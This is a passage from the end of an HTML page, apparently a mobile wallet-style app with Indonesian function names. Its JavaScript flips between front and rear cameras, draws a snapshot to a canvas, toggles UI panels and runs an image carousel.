        on_stream_video.srcObject = stream;
        on_stream_video.play();
      })
      .catch(function(err) {
        console.log(err)
      });
  }

  flipBtn.addEventListener('click', function(){
    if( stream == null ) return
    // we need to flip, stop everything
    stream.getTracks().forEach(t => {
      t.stop();
    });
    // toggle / flip
    shouldFaceUser = !shouldFaceUser;
    capture();
  })

  capture();

  document.getElementById("capture-camera").addEventListener("click", function() {
    // Elements for taking the snapshot
      const video = document.querySelector('video');
      canvas.width = video.videoWidth;
      canvas.height = video.videoHeight;
      canvas.getContext('2d').drawImage(video, 0, 0);
  });    
  
  
}  
  
  
  
</script>
<script>
function capture(){
    document.getElementById('canvas').style.display = "block";
     document.getElementById('ulangikunya').style.display = "block";
     setTimeout(() => {
     document.getElementById('hasil').style.display = "block";
     },1600)
 $( document ).ready(function() {
            setTimeout(() => {
                $('#floatingCirclesG').hide();
            },1500)
                $('#floatingCirclesG').fadeIn();
           
               
          
        })
}

function kuulangi(){
    document.getElementById('canvas').style.display = "none";
    document.getElementById('ulangikunya').style.display = "none";
}


function mengulang(){
    document.getElementById('hasil').style.display = "none";
    document.getElementById('canvas').style.display = "none";
    document.getElementById('ulangikunya').style.display = "none";
}

function kembalikeluar(){
    document.getElementById('videoku').style.display = "none";
      document.getElementById("hasil").style.display = "none";
   
     
   document.getElementById("tombolback").style.display = "block";
  document.getElementById("login").style.display = "none";
}


function backbuttonku(){
     document.getElementById('videoku').style.display = "none";
     document.getElementById("aktivity").style.display = "none";
}


function ambilgambar(){
    document.getElementById('videoku').style.display = "block";
}


function bukaaktivi(){
document.getElementById('aktivity').style.display = "block";
document.getElementById('dompet').style.display = "none";
}



function hanyaloding(){
     $("#process1").show();
 setTimeout(() => {
    
},2000);
 setTimeout(() => {
       $("#process1").hide();
 },3000);
}



function bukadompet(){
 document.getElementById('dompet').style.display = "block";   
    document.getElementById('videoku').style.display = "none";
}
</script>

  
  
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js">
            </script> 
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js">
            </script>

<script>
            $(document).ready(function() {
                $('.slider').slick({
                    autoplay: true,
                    autoplaySpeed: 800,
                    dots: true
         
                });
            });
            </script>
<script>
window.onload = function(){
     $('html').addClass('bodywell');
      $('html').show();
     
}
</script>
</body>
</html>        